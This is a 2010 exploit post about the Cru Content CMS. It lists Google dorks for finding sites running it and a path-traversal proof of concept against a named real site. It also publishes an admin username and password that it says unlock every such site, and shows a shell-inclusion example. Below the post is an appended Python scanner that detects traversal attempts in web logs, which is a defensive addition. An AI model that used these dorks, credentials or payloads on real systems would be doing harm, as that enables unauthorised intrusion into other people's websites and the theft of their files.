
Cru Content CMS remote file disclosure vulnerability

Posted on 06 March 2010

====================================================
Cru Content CMS remote file disclosure vulnerability
====================================================

[~]"Cru Content" Remote File Download Vulnerability
[~]CMS Site:crudigital.com.au
[~]Dork:"Powered By Cru Content"
[~]POC:www.cloudland.tv/cms/download.php?file=../index.php
[~]Found by fx0
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
[~]This vuln is just pure human stupidity
[~]You can find vuln links here = http://www.warpstudio.com/hrvatski/reference/
[~]For every site the username and the password is the same
[~]Admin path /admin/
[~]Username:atila
[~]Password:bicbozji
[~]Found by fx0.
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
[~]Dork: inurl:".php?func=page_cms"
[~]Ex: www.site.com/index.php?func=<shell.txt?>
[~]Found by fx0.
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

# ~ - [ [ : Inj3ct0r : ] ]
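A defender-side check for the traversal pattern in the download.php PoC above, added here as an example and not part of the original advisory: it scans web access logs for download.php requests whose file parameter resolves outside the download directory, including percent-encoded and double-encoded forms. The base directory /cms/files, the function names and the log lines are assumptions constructed for illustration.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')  # request line of a log entry
BASE_DIR = "/cms/files"  # assumed download directory; not stated on the page

def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly so double-encoded '../' is exposed."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def escapes_base(file_param, base=BASE_DIR):
    """True if the parameter, resolved under base, lands outside base."""
    cleaned = fully_decode(file_param).replace("\\", "/").split("\x00")[0]
    resolved = posixpath.normpath(posixpath.join(base, cleaned))
    return not (resolved == base or resolved.startswith(base + "/"))

def flag_traversal(log_lines, script="download.php", param="file"):
    """Return (line_number, decoded_value) for requests that escape base."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.endswith("/" + script):
            continue
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            if escapes_base(value):
                hits.append((number, fully_decode(value)))
    return hits

# Constructed sample log lines (documentation-range addresses).
SAMPLE_LOG = [
    '192.0.2.10 - - [06/Mar/2010:10:00:01 +0000] "GET /cms/download.php?file=brochure.pdf HTTP/1.1" 200 48211',
    '192.0.2.44 - - [06/Mar/2010:10:00:07 +0000] "GET /cms/download.php?file=../index.php HTTP/1.1" 200 3120',
    '192.0.2.44 - - [06/Mar/2010:10:00:09 +0000] "GET /cms/download.php?file=%252e%252e%252findex.php HTTP/1.1" 200 3120',
    '192.0.2.44 - - [06/Mar/2010:10:00:12 +0000] "GET /cms/download.php?file=docs/../brochure.pdf HTTP/1.1" 200 48211',
    '192.0.2.10 - - [06/Mar/2010:10:00:15 +0000] "GET /cms/index.php HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for number, value in flag_traversal(SAMPLE_LOG):
        print(f"line {number}: escapes download directory: {value}")
```

The same escapes_base resolution, applied server-side before the file is opened, is the containment check a download handler needs; a 200 response on a flagged line means the file was served.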

 
